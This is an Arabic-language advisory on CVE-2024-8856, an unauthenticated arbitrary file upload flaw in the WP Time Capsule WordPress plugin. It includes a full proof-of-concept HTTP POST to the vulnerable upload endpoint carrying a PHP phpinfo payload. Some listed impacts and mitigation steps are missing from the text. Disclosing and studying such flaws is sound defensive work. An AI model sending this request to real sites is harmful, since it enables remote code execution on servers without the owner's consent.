
ثغرة رفع ملفات عشوائي في إضافة WP Time Capsule لـ WordPress
CVE-2024-8856 هي ثغرة أمنية تم اكتشافها في إضافة WP Time Capsule لووردبريس، وتسمح للمستخدمين غير المصادَق عليهم برفع ملفات تعسفية إلى الخادم. يمكن أن يؤدي ذلك إلى تنفيذ تعليمات برمجية عن بُعد (RCE) إذا قام الخادم بتنفيذ الملفات المرفوعة. تنشأ الثغرة بسبب عدم كفاية التحقق من صحة الملفات، ويمكن استغلالها عبر إرسال طلبات مصممة خصيصًا إلى نقطة النهاية المعرّضة للخطر.
تسمح هذه الثغرة للمستخدمين غير المصادَق عليهم بـ:
فيما يلي إثبات مفهوم يوضح كيفية استغلال ثغرة CVE-2024-8856 عبر إرسال طلب POST إلى نقطة النهاية المعرّضة للخطر.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
<?php phpinfo();، والذي سيعرض تفاصيل إعدادات PHP إذا تم تنفيذه./wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php هي موضع الاستغلال.لتخفيف هذه الثغرة:
CVE-2024-8856 - قاعدة بيانات الثغرات الوطنية
CVE-2024-8856 هي ثغرة خطيرة تتطلب اهتمامًا فوريًا من مسؤولي مواقع WordPress التي تستخدم إضافة WP Time Capsule. ينبغي اتخاذ الاحتياطات المناسبة لتأمين التطبيق ضد الاستغلال المحتمل. حافظ دائمًا على مواكبة الممارسات الأمنية وتحديثات الإضافات.